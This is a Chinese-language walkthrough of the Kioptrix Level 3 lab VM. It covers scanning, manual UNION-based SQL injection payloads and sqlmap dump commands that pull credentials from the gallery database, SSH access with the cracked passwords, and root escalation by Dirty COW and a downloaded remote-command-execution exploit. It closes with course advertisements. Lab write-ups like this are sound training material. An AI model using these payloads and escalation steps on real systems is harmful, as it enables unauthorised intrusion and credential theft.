Kioptrix-Level Three 思路整理

admin 2025年1月11日13:07:27评论19 views字数 2716阅读9分3秒阅读模式
 

基本信息

  • 基本信息攻击机:192.168.38.128;靶机:192.168.38.132Kioptrix-Level Three 思路整理

web样式无法显示的问题

  • 原因:样式是以这个域名为基准链接的,而这个域名解析其实要到本地靶机的地址的。Kioptrix-Level Three 思路整理
  • 修改hosts文件,将这个域名指向靶机地址,然后刷新一下就可以正常显示了。
echo"192.168.38.132 kioptrix3.com" >>/etc/hosts
Kioptrix-Level Three 思路整理

信息收集

dirb目录扫描

Kioptrix-Level Three 思路整理

dirsearch目录扫描

Kioptrix-Level Three 思路整理

whatweb指纹

Kioptrix-Level Three 思路整理

nmap服务扫描

  • 只有8022端口开放的Kioptrix-Level Three 思路整理

主机详细信息

  • 操作系统:Ubuntu Liunx
  • 内核版本:Linux 2.6.9 - 2.6.33

服务信息

端口
服务
版本
22/tcp
ssh
OpenSSH 4.7p1
80/tcp
http
Apache httpd 2.2.8
php
5.2.4-2ubuntu5.6

查找攻击点

Web服务|80

cache路径

  • 三个页面返回404,now进入到另一个目录的页面。Kioptrix-Level Three 思路整理

gallery路径

  • 不同照片跳转不同路径的页面Kioptrix-Level Three 思路整理
  • 照片页面有传参,后续尝试抓包测试Kioptrix-Level Three 思路整理
参数测试
  • 参数对应,除了能改评分多少似乎没任何作用,阿巴阿巴。。。Kioptrix-Level Three 思路整理
  • 只能改一次!给了个50分。Kioptrix-Level Three 思路整理
针对路径扫描
  • 针对/gallery/路径重新扫描一遍,有时候会遗漏掉一些敏感文件或路径。Kioptrix-Level Three 思路整理
  • 数据库文件,暂时先留着。Kioptrix-Level Three 思路整理
  • 照片管理后台和泄露的版本文件。尝试万能密码无效果。Kioptrix-Level Three 思路整理
  • 发现页面存在SQL注入,根据后台版本去查找poc刚好也指向这个页面Kioptrix-Level Three 思路整理
SQL手动测试
  • order by根据第七个字段进行排序的时候报错了,证明只有六个字段
id=1 order by 6 -- 
Kioptrix-Level Three 思路整理
Pasted-image-20250101183236
  • 联合查询六个字段,只显示查询的2,3字段,判断出显错点为2,3。
1 union select1,2,3,4,5,6-- 
Kioptrix-Level Three 思路整理
  • 根据已知的显错点,将字段查询改为数据库查询。得知数据库为gallery
1 union select1,2,database(),4,5,6-- 
Kioptrix-Level Three 思路整理
  • 查询gallery数据库中含有的表
1 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema="gallery" -- 
Kioptrix-Level Three 思路整理
  • 注意到有个users表,查询他表的字段,注意到有用户名和密码字段
1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="gallarific_users" -- 
Kioptrix-Level Three 思路整理
  • 查询表中用户名和密码字段的数据
1 union select 1,group_concat(username),group_concat(password),4,5,6 from gallarific_users
Kioptrix-Level Three 思路整理
  • 不过这个是博客后台的登录密码,回到了之前发现的后台页面登录进去,尝试文件上传,无效果。Kioptrix-Level Three 思路整理
  • 继续查询,注意到一可疑的dev_accounts。查询字段
1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="dev_accounts"
Kioptrix-Level Three 思路整理
  • 查询表中的数据
1 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts
Kioptrix-Level Three 思路整理
  • 通过MD5解密得知用户对应的密码,解密的网站:MD5在线解密原理其实和碰撞一样,不过碰撞需要时间。而他有数据库记录了一些常见的。
用户名
密码
dreg
Mast3r
loneferret
starwars
sqlmap|工具注入
#获取当前数据库sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch --current-db#查询数据库中的表sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -tables#获取表的数据sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users,dev_accounts --dump
用户提权|方法一
  • 尝试SSH登录两个账户需要指定密钥,权限等级都为普通权限
ssh -oHostKeyAlgorithms=+ssh-rsa [email protected]
Kioptrix-Level Three 思路整理
  • 查看系统内核架构和版本Kioptrix-Level Three 思路整理
  • 查找poc,ubuntu下没可用poc内核需要进一步使用。Kioptrix-Level Three 思路整理
  • -m复制到当前目录利用pythonhttp服务上传上去。漏洞名字为:Dirty COWKioptrix-Level Three 思路整理
  • 根据exp提示输入新密码,然后等待一段是时间就创建出一个新的用户和密码。Kioptrix-Level Three 思路整理
  • 使用新用户和密码登录,直接是管理员权限了。Kioptrix-Level Three 思路整理

phpmyadmin目录

  • 一个phpmyadmin登录页面。Kioptrix-Level Three 思路整理
  • 用户名使他闭合成功登录进去,不过看了看只能看到表的结构看不到内容Kioptrix-Level Three 思路整理
  • whatweb获取指纹的版本信息,查找poc,未发现可留用点。Kioptrix-Level Three 思路整理
  • 管理系统的安装,不过没密码,尝试万能密码没效果。尝试使用上一个目录的密码也无效果。Kioptrix-Level Three 思路整理

根目录

  • 通过探索发现存在两个传参测试能爆出路径,不过不是伪协议。Kioptrix-Level Three 思路整理
  • 在登录页面测试,不存在sql注入,注意到下面有个技术支持的,这个在信息收集中很重要。Kioptrix-Level Three 思路整理
  • 查找相关的poc,发现存在历史漏洞,不过第一个要用msf掠过先去看第二个多个漏洞的pocKioptrix-Level Three 思路整理
  • 只存在XSSCSRF打靶机时没作用。。。。Kioptrix-Level Three 思路整理
  • 查找到一个远程命令执行expgit下载测试并执行。exp地址:地址Kioptrix-Level Three 思路整理
  • 最近刚学到的一个方式来执行bash,通过python来创建一个提示python -c 'import pty;pty.spawn("/bin/bash")'Kioptrix-Level Three 思路整理
  • 获取系统信息Kioptrix-Level Three 思路整理
  • 使用exp获取,和上一个方法一样提权。Kioptrix-Level Three 思路整理
  • 登录提权成功Kioptrix-Level Three 思路整理

附录

OSCP培训

学习没思路?安全不知道怎么学习的朋友可以了解一下OSCP证书课程一次报名后续相关的课程都免费哦,咨询也不吃亏。实在不放心还可以关注公众看一下我们零开始到红队的公益课程不含任何费用公众号

Kioptrix-Level Three 思路整理

帮会

也可以了解一下我们帮会,是真正的红队大佬创建的,里面会定时丢些网上没有的工具。以及文章中包含的所有工具

Kioptrix-Level Three 思路整理

聊天群聊

加入群聊一起交流学习,有什么疑问可以一起交流。Kioptrix-Level Three 思路整理

原文始发于微信公众号(泷羽Sec-小篮子):Kioptrix-Level Three 思路整理

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日13:07:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Kioptrix-Level Three 思路整理https://cn-sec.com/archives/3603086.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息